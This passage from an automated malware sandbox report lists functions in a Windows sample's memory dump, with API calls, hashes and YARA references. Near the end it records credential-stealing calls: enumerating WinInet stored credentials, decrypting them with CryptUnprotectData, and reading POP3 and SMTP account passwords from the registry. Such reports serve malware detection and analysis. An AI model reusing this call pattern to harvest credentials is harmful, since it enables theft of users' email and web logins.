API String ID: 2738559852-0
Opcode ID: acaac340ea075798355b7a76716ac3f8d807ef000a523cb7dba276451aed9ca5
Instruction ID: b2856fa76417eeaae25239adddc27ac655f403bf8eafa223ee5e10a7ae46ea81
Opcode Fuzzy Hash: acaac340ea075798355b7a76716ac3f8d807ef000a523cb7dba276451aed9ca5
Instruction Fuzzy Hash: 3D019E31600105BFE708CF19D881AA6BBB9FB84304F04822AE40587651E3B1BD948BD0

Uniqueness

Uniqueness Score: -1.00%

Function 004127D9, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00412CC4

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 42f14e3a69adf4fcbd42d414f1efc088cbdb0d8e0bfd297498382261ef7c5446
Instruction ID: 0e098f1d557931f958148dbbe14accd0e30490d6976fbe004dc29ea775a3d500
Opcode Fuzzy Hash: 42f14e3a69adf4fcbd42d414f1efc088cbdb0d8e0bfd297498382261ef7c5446
Instruction Fuzzy Hash: CCF0D6B2A051216F9B149E5EA94049BF799FB84754320411FE918E7340E7B4AC5085C4

Uniqueness

Uniqueness Score: -1.00%

Function 00445166, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f874ddcf992f3c3c6c59b5b3d98718a30df31dcc146f703c06fc5feda4c2f9c5
Instruction ID: 13684ca19e7c19ffe86e0d6c3d5b9d4de08ff2cfd1c634039dab65eabff4720b
Opcode Fuzzy Hash: f874ddcf992f3c3c6c59b5b3d98718a30df31dcc146f703c06fc5feda4c2f9c5
Instruction Fuzzy Hash: CEF0A932901E1457EE31666A9C05B5B32989F42379F25071FFD24922D3DF7CE80A869E

Uniqueness

Uniqueness Score: -1.00%

Function 00420568, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042056D

Part of subcall function 0041FCB2: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,004205B0,?,?,00000244,00488780,00000000,00000001,?,004208FF), ref: 0041FCD1
Part of subcall function 0041FCB2: _strlen.LIBCMT ref: 0041FCD8

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectoryH_prolog_strlen
String ID:
API String ID: 1906034785-0
Opcode ID: 2e11c9215a7ba952f10d9dec40afdaeaee524692f695b28bfd3b63b049fecccb
Instruction ID: 8f4f766da947a39cfd01fa68859b9d028871f64d1bddd01dbdfe974dcb1ef4d4
Opcode Fuzzy Hash: 2e11c9215a7ba952f10d9dec40afdaeaee524692f695b28bfd3b63b049fecccb
Instruction Fuzzy Hash: BA01AC71611702AFD3449F399C857AABAE8FF45324F10432FE025D72D2DB789941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA9C, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040AAA1

Part of subcall function 0040A9DC: __EH_prolog.LIBCMT ref: 0040A9E1
Part of subcall function 0040A9DC: ___std_fs_directory_iterator_open@12.LIBCPMT ref: 0040AA4C

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$___std_fs_directory_iterator_open@12
String ID:
API String ID: 1512400408-0
Opcode ID: b559db8ff5c56a8f67874d0cfc07117f73eac39842f714beab7192a8586eefe9
Instruction ID: e377c236dd62adbf3a3ef1934febb3bb85398013c8040f262c9f5580056daf97
Opcode Fuzzy Hash: b559db8ff5c56a8f67874d0cfc07117f73eac39842f714beab7192a8586eefe9
Instruction Fuzzy Hash: EE0161719057059FCB28DF69819069FBBF4AF04314F10462FE49693381D7745A44CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00412C86, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00412CC4

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 7f2154abac93bee06b204b89b1770a2866ae5e1d9802e0767136c66ac473bf22
Instruction ID: caee75e532d79a9b598ef0ea57ca1e2c6e302ed49e5e23ccca62360303ccab97
Opcode Fuzzy Hash: 7f2154abac93bee06b204b89b1770a2866ae5e1d9802e0767136c66ac473bf22
Instruction Fuzzy Hash: DAF0C8B3A051216F97149E5EA94144BF7D9FB84760720011FE91CE7340E7B4BD5085D4

Uniqueness

Uniqueness Score: -1.00%

Function 00454FBC, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 0045850D: HeapAlloc.KERNEL32(00000008,?,00000000,?,0045736D,00000001,00000364,00000008,000000FF,?,004401D2,?,?,00414650,?), ref: 0045854E

_free.LIBCMT ref: 00454FDC

Part of subcall function 00457FE3: RtlFreeHeap.NTDLL(00000000,00000000,?,0046146B,?,00000000,?,?,?,0046170E,?,00000007,?,?,00461B0F,?), ref: 00457FF9
Part of subcall function 00457FE3: GetLastError.KERNEL32(?,?,0046146B,?,00000000,?,?,?,0046170E,?,00000007,?,?,00461B0F,?,?), ref: 0045800B

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocErrorFreeLast_free
String ID:
API String ID: 3091179305-0
Opcode ID: fc5169e07c96bd685d5387a54b4fcf998bad6721f73858e685e1c4f565c3509c
Instruction ID: 7054d58e949489bd53ac7515c0275a745f1ea6e52b1439f5ae7ec5743b7d0c3c
Opcode Fuzzy Hash: fc5169e07c96bd685d5387a54b4fcf998bad6721f73858e685e1c4f565c3509c
Instruction Fuzzy Hash: 330108B6D00219AFCB10DFA9D841A9EBBB8FB48710F10422AE914E7241E774AA44CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 00464160, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004641C3

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a94c1e8ed22497acdbef1ba1fd8e7d8ffb3c70f8b820077d0e9993faea048f79
Instruction ID: 027a2c0be38452a1ce383e2f5702291adaac393c38664a96b0ec204eb3fac7d3
Opcode Fuzzy Hash: a94c1e8ed22497acdbef1ba1fd8e7d8ffb3c70f8b820077d0e9993faea048f79
Instruction Fuzzy Hash: B9018F72C04119BFCF01AFA88C059EE7FB5BF48314F14416AFD14E21A1E6358A60DB85

Uniqueness

Uniqueness Score: -1.00%

Function 004129C7, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004129CC

Part of subcall function 00413DA4: __EH_prolog.LIBCMT ref: 00413DA9
Part of subcall function 00413DA4: std::_Lockit::_Lockit.LIBCPMT ref: 00413DB7
Part of subcall function 00413DA4: int.LIBCPMT ref: 00413DCE
Part of subcall function 00413DA4: std::_Lockit::~_Lockit.LIBCPMT ref: 00413E1E

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologLockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 1350124489-0
Opcode ID: 461c48fe403ac9d440876e6ec101c94ff546250139541d0ad5f7d4e8eeb681a4
Instruction ID: c434b697f8c53097445019a40e5bb927d44771b075c49f0c0e8e2ea380da5454
Opcode Fuzzy Hash: 461c48fe403ac9d440876e6ec101c94ff546250139541d0ad5f7d4e8eeb681a4
Instruction Fuzzy Hash: 8701A771A20110DFD755EB55CA05BEE73E4EF08705F00402EB405E7292DBB8EE50CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004097F7, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004097FC

Part of subcall function 004095E7: __EH_prolog.LIBCMT ref: 004095EC
Part of subcall function 004095E7: std::_Lockit::_Lockit.LIBCPMT ref: 004095FC
Part of subcall function 004095E7: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00409639

Part of subcall function 004097C4: __Getctype.LIBCPMT ref: 004097DF

Part of subcall function 0040965D: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040967A
Part of subcall function 0040965D: std::_Lockit::~_Lockit.LIBCPMT ref: 004096EB

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::_$H_prologLocinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID:
API String ID: 1713013424-0
Opcode ID: 126b824393f1d5c09ec2e37a766e3d0c38e17aaa221827c77816a57a47541a28
Instruction ID: 4af4f7efd611e0bbd4d6de8c50925f7526f85ecdfeb6d4872c78a751e4295838
Opcode Fuzzy Hash: 126b824393f1d5c09ec2e37a766e3d0c38e17aaa221827c77816a57a47541a28
Instruction Fuzzy Hash: 1DF09673510215ABDB15BF59C852B9E77B4AF50B14F10802FF405B72C2DB785D04C689

Uniqueness

Uniqueness Score: -1.00%

Function 0040A981, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040A99A

Part of subcall function 0043EFBC: FindNextFileW.KERNEL32(?,?,?,0040AA65,?,?,?,?,?,?,?,?,00000000), ref: 0043EFC5

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFindNext___std_fs_directory_iterator_advance@8
String ID:
API String ID: 3878998205-0
Opcode ID: b14b9e766cb8d11d923b8eae4732c20c70cd9244aa0c3be2c5f5584d1c561765
Instruction ID: 786aef3f6954a22798eff1a87afa34900a3c8d969515b4c2b0423792bc31befd
Opcode Fuzzy Hash: b14b9e766cb8d11d923b8eae4732c20c70cd9244aa0c3be2c5f5584d1c561765
Instruction Fuzzy Hash: A3F0E97131070457EB346626CD4577BB3A8AF80315F010C7FA981F31C1E6B8AC50855E

Uniqueness

Uniqueness Score: -1.00%

Function 0045918E, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,004401D2,?,?,00414650,?,?,0041306E,?,?,?,00000000,?), ref: 004591C0

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: be8b65e2839ea773a393bfd8d8c218399c99b2fc238a0e1b1befe52690129737
Instruction ID: 56f4cfcb82363ac18a679079ea8552777963f317c6836842f6b813f2b54360bc
Opcode Fuzzy Hash: be8b65e2839ea773a393bfd8d8c218399c99b2fc238a0e1b1befe52690129737
Instruction Fuzzy Hash: BAE0A035100A33E6BA2126669C0875B3A49DB023A6F1D0527AC0592783DB28CC0985ED

Uniqueness

Uniqueness Score: -1.00%

Function 00413383, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00413388

Part of subcall function 004133DB: __EH_prolog.LIBCMT ref: 004133E0
Part of subcall function 004133DB: std::locale::_Init.LIBCPMT ref: 00413428

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Initstd::locale::_
String ID:
API String ID: 1266419734-0
Opcode ID: aea23e5e1c7f26d8b6fa45439ab9ea0fcc52410a705ac5c81f8be841db386ccb
Instruction ID: 1e5ba366b068d9671d529f87e40a12a47e3df1e068544780cfa82af07c9af5b4
Opcode Fuzzy Hash: aea23e5e1c7f26d8b6fa45439ab9ea0fcc52410a705ac5c81f8be841db386ccb
Instruction Fuzzy Hash: F8F0B7B5A146159FC719CF08C485D6ABBE4EB18304B00C55EA45AC7301D7B4ED41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00413514, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00413519

Part of subcall function 004135BF: __EH_prolog.LIBCMT ref: 004135C4
Part of subcall function 004135BF: std::_Lockit::_Lockit.LIBCPMT ref: 004135D2
Part of subcall function 004135BF: int.LIBCPMT ref: 004135E9
Part of subcall function 004135BF: std::_Lockit::~_Lockit.LIBCPMT ref: 00413639

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologLockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 1350124489-0
Opcode ID: 86f554fc3e761d6b0629a781467418c1c630e79fbf77a7c9fdcbf34a710f5886
Instruction ID: a8e4e32ddfe87f030bc516392fbfca3139fd5d07fbf71dfdd4908f6783b08c68
Opcode Fuzzy Hash: 86f554fc3e761d6b0629a781467418c1c630e79fbf77a7c9fdcbf34a710f5886
Instruction Fuzzy Hash: DCF05E75A10104EFCB04EF54C595AADB7F5FF48304F10815EE4069B352DB79EA08CA29

Uniqueness

Uniqueness Score: -1.00%

Function 0042885D, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00428890

Part of subcall function 00429738: _Deallocate.LIBCONCRT ref: 0042974F

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 63987a628f75578457b1de7b2d09be3858c344669bc4ccb125cfa67e1fd7b9b9
Instruction ID: 58d339b06faf16c3792f4a6bc4d624c8646d95f56b936f6658966aff92ac124e
Opcode Fuzzy Hash: 63987a628f75578457b1de7b2d09be3858c344669bc4ccb125cfa67e1fd7b9b9
Instruction Fuzzy Hash: 67E0E5317043246BE724AA06E405E47BBD99F903A0F58886FF04847291CB75BC40C79C

Uniqueness

Uniqueness Score: -1.00%

Function 00423876, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 004238B6

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: ce0888c1a0dd92faf2922c1a98b751cc57bfafe48c21b2035b6f2d560103515f
Instruction ID: 26b5d8b355359e7864326178c828bb48c8c9fd828b961fad310d91f430f308b7
Opcode Fuzzy Hash: ce0888c1a0dd92faf2922c1a98b751cc57bfafe48c21b2035b6f2d560103515f
Instruction Fuzzy Hash: D4E0ED3170823255E1387E3AF916B6227F1DF01306F80851FF0968D7A0CE8EEE81968C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A676, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__EH_prolog2.LIBCMT ref: 0040A67D

Part of subcall function 0040A2D4: __EH_prolog.LIBCMT ref: 0040A2D9

Part of subcall function 004432AB: RaiseException.KERNEL32(E06D7363,00000001,00000003,004090EB,?,?,?,004090EB,?,004853BC), ref: 0044330B

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionH_prologH_prolog2Raise
String ID:
API String ID: 1276564762-0
Opcode ID: 36bd0a6d51c30f5aaee7f12d015ed4c203fc98ff88eba013819a30f97302d903
Instruction ID: 6cdaae375658fcdab4018d469116dcf97d3cd22aaeaeab6f728bc95c36adb6c4
Opcode Fuzzy Hash: 36bd0a6d51c30f5aaee7f12d015ed4c203fc98ff88eba013819a30f97302d903
Instruction Fuzzy Hash: 64F08C31910118BADB10FBA1CC4AFDE7B38BF04308F1480AAB144B70D1EB38AA08CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC66, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040AC6B

Part of subcall function 004137E4: __EH_prolog.LIBCMT ref: 004137E9

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ff9861f27f77417ab95cbd856b44cfd1abc938c40735cdb2f78bd95fff57564d
Instruction ID: 7b56fd564ee5dba22c1b256a7910ee9a5b5d76db5c36e8c87beafa9b19ca48cc
Opcode Fuzzy Hash: ff9861f27f77417ab95cbd856b44cfd1abc938c40735cdb2f78bd95fff57564d
Instruction Fuzzy Hash: 27E06DB1A247159BCB14DF68C80168AB6E4EB58758B10C93FA445E3340E778DA008788

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF03, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040AF08

Part of subcall function 00413886: __EH_prolog.LIBCMT ref: 0041388B

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a7b9227a42579bb225a77cb24e2b44158b2e34b4692b9aa13c7cae12d2ffbd39
Instruction ID: 6095d6418412deed06a35367cec5ea556f7f2b94be48555c84b2d961f3d52009
Opcode Fuzzy Hash: a7b9227a42579bb225a77cb24e2b44158b2e34b4692b9aa13c7cae12d2ffbd39
Instruction Fuzzy Hash: 37E06DB2A257159BCB18DF68C80168A76E4EB18758B10C93FB445E3300E778DA008788

Uniqueness

Uniqueness Score: -1.00%

Function 0041C85C, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00412F3C

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: cfb103849b436ae228fc88090009eefed5c8925b4fa4a7545bbea55d6a497ab3
Instruction ID: 45e9017656f6a52bd7424a5e16e4d09d4cc10a3c4bd0a25d5d33bb1e2e1ad873
Opcode Fuzzy Hash: cfb103849b436ae228fc88090009eefed5c8925b4fa4a7545bbea55d6a497ab3
Instruction Fuzzy Hash: 64E08C310042008BFB388E14E1007A673E1EB02318F60094EE085C6690C7A9AC849698

Uniqueness

Uniqueness Score: -1.00%

Function 0043F433, Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001300,00000000,?,00000000,?,00000000,00000000), ref: 0043F449

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 8880be27594fe1dc46eab3789d79d605a080d5e10a8aa48689f371cbc42518ee
Instruction ID: 558cf98cde0a510390d68fe92a3eaff0fba5e2f9fa2b07517afb1c2e6d705b46
Opcode Fuzzy Hash: 8880be27594fe1dc46eab3789d79d605a080d5e10a8aa48689f371cbc42518ee
Instruction Fuzzy Hash: 7FD0C9B6501118BFFA012B959C05CF7BB9CEF197A1B009022FE44CA011D5729D1097B5

Uniqueness

Uniqueness Score: -1.00%

Function 0041C959, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

___std_fs_set_current_path@4.LIBCPMT ref: 0041C967

Part of subcall function 0040A676: __EH_prolog2.LIBCMT ref: 0040A67D

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog2___std_fs_set_current_path@4
String ID:
API String ID: 2482923176-0
Opcode ID: 6d17d1cff17333b9a7c79be5ad3722d5f535a8e865ce86925c57640275841327
Instruction ID: 0a86e6c55615681b0d0e75044d596b77bbb09aa8d0d1ee6bb9c17a49818965c4
Opcode Fuzzy Hash: 6d17d1cff17333b9a7c79be5ad3722d5f535a8e865ce86925c57640275841327
Instruction Fuzzy Hash: A6C01270A72B2043CA24656DBD488C751DD5F0F709710887FB881D3604D578CD8546EC

Uniqueness

Uniqueness Score: -1.00%

Function 00412F2D, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00412F3C

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 8683cf75634a25b4ebf4ab8eea4d9658ca03a54007cf1f59d80224101586a068
Instruction ID: 10cf1057b39a453f28e862301a9428c92d1bb2c0edcf9b409483b8ecb0c5bb88
Opcode Fuzzy Hash: 8683cf75634a25b4ebf4ab8eea4d9658ca03a54007cf1f59d80224101586a068
Instruction Fuzzy Hash: D0D05E310046008FF3349E08F1017A277E5EB01314F20094EE0D5C6591C7A95CC4879D

Uniqueness

Uniqueness Score: -1.00%

Function 00429738, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

Part of subcall function 00423876: _Deallocate.LIBCONCRT ref: 004238B6

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

_Deallocate.LIBCONCRT ref: 0042974F

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 7dcff07c2cf8da4292e1838422964ab4eb11848b32d4236dc934cd1c7a8a9f78
Instruction ID: 864210b1f39a9d44453f394bce83569d90a1c4620578aa5f8520fc43bdad9600
Opcode Fuzzy Hash: 7dcff07c2cf8da4292e1838422964ab4eb11848b32d4236dc934cd1c7a8a9f78
Instruction Fuzzy Hash: D4C0223320C20025D20DB717F802CD963B8EFE2334700002FF008050C05E18A986C09C

Uniqueness

Uniqueness Score: -1.00%

Function 00463EA7, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00464297,?,?,00000000,?,00464297,00000000,0000000C), ref: 00463EC4

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7e37b2f97575dc0254c26ad9aa3f0fa52951ac1588ed93c35a03c0d82901148c
Instruction ID: 1683f18ab777b9f427d836d21452a745f8e35c4b12b45357bacd302cc903320f
Opcode Fuzzy Hash: 7e37b2f97575dc0254c26ad9aa3f0fa52951ac1588ed93c35a03c0d82901148c
Instruction Fuzzy Hash: 28D06C3210010DBBDF128F94DC06EDA3BAAFB4C714F018050FA1856020C772E821AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00435DD0, Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00435DEB

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: b5ee8a5701466d33f9cbc78514380c3bbbdd93b9be7c2a415b78b77fc25f71fa
Instruction ID: 6223cfaa72ab82669a20bc440cf7149b8fb7925aead8d04b015655650725991c
Opcode Fuzzy Hash: b5ee8a5701466d33f9cbc78514380c3bbbdd93b9be7c2a415b78b77fc25f71fa
Instruction Fuzzy Hash: 93D0C974D0810DEBCF50DB90D949AC9B7BCAB04308F0004A294C1E3140EAF4ABCA9B91

Uniqueness

Uniqueness Score: -1.00%

Function 00445A55, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445A68

Part of subcall function 00457FE3: RtlFreeHeap.NTDLL(00000000,00000000,?,0046146B,?,00000000,?,?,?,0046170E,?,00000007,?,?,00461B0F,?), ref: 00457FF9
Part of subcall function 00457FE3: GetLastError.KERNEL32(?,?,0046146B,?,00000000,?,?,?,0046170E,?,00000007,?,?,00461B0F,?,?), ref: 0045800B

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: e604c8a294d64a0052e12ad6042e8ff2da1b84093215c4a0307e54f67f5992e0
Instruction ID: 22d6937be2526dc59ff857a35040620ee46eab35b37312ddff15c65259e4e18c
Opcode Fuzzy Hash: e604c8a294d64a0052e12ad6042e8ff2da1b84093215c4a0307e54f67f5992e0
Instruction Fuzzy Hash: ACC04C72504208BBDB05DB46D90AE4E7BA9DB80368F204059F81557251DAB5EF449694

Uniqueness

Uniqueness Score: -1.00%

Function 0042A869, Relevance: 1.3, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0042A878

Part of subcall function 0042A224: CoCreateInstance.OLE32(0046DB80,00000000,00000015,0046DBA0,?), ref: 0042A244

Part of subcall function 0042A130: lstrlenW.KERNEL32(?), ref: 0042A156
Part of subcall function 0042A130: lstrlenW.KERNEL32(00000002), ref: 0042A167
Part of subcall function 0042A130: CredEnumerateW.SECHOST(Microsoft_WinInet_*,00000000,00000000,?), ref: 0042A190
Part of subcall function 0042A130: CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 0042A1D6
Part of subcall function 0042A130: LocalFree.KERNEL32(?), ref: 0042A200
Part of subcall function 0042A130: CredFree.ADVAPI32(?), ref: 0042A219

Part of subcall function 0042A2F9: GetVersionExW.KERNEL32(?), ref: 0042A341
Part of subcall function 0042A2F9: LoadLibraryA.KERNEL32(?), ref: 0042A395
Part of subcall function 0042A2F9: GetProcAddress.KERNEL32(00000000,?), ref: 0042A3E2
Part of subcall function 0042A2F9: GetProcAddress.KERNEL32(00000000,?), ref: 0042A41E
Part of subcall function 0042A2F9: GetProcAddress.KERNEL32(00000000,?), ref: 0042A45E

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$CredFreelstrlen$CreateCryptDataEnumerateInitializeInstanceLibraryLoadLocalUnprotectVersion
String ID:
API String ID: 1367598280-0
Opcode ID: 6c80f3bb9b7919e58b39df1b233aa9bb1dc29917460d2c4c51bb628cb8dc8a73
Instruction ID: ebd16326eb686ad43e5c991a10910887fe2c550f7f1a0d1f856031dafe3edce1
Opcode Fuzzy Hash: 6c80f3bb9b7919e58b39df1b233aa9bb1dc29917460d2c4c51bb628cb8dc8a73
Instruction Fuzzy Hash: F8E0C230668204ABC204EB51ED07B6AB3D8DB40B19F40865DBC9C422D0BFB8AD24D66B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00434A5F, Relevance: 73.8, APIs: 10, Strings: 32, Instructions: 282stringencryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 0043592B: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00000100,00000100,?,SMTP Email Address,0047C928), ref: 00435973
Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 00435992
Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004359CD
Part of subcall function 0043592B: RegCloseKey.ADVAPI32(00000100), ref: 004359EE

CryptUnprotectData.CRYPT32(0047CB80,00000000,00000000,00000000,00000000,00000001,?), ref: 00434CB2
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00434CEA
lstrlenW.KERNEL32(POP3 Password,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00434CF7
lstrlenW.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00434D1B
lstrlenW.KERNEL32(POP3 Port,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00434D9C
wsprintfA.USER32 ref: 00434DC8
lstrlenA.KERNEL32(?), ref: 00434DD5
lstrlenW.KERNEL32(000007FF,?,?,00000000,00000000), ref: 00434B4A

Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68

lstrlenW.KERNEL32(SMTP Email Address,?,?,00000000,00000000), ref: 00434B26

Part of subcall function 00435A1E: lstrlenA.KERNEL32(?,?,73B769A0,?,00000000), ref: 00435A4F
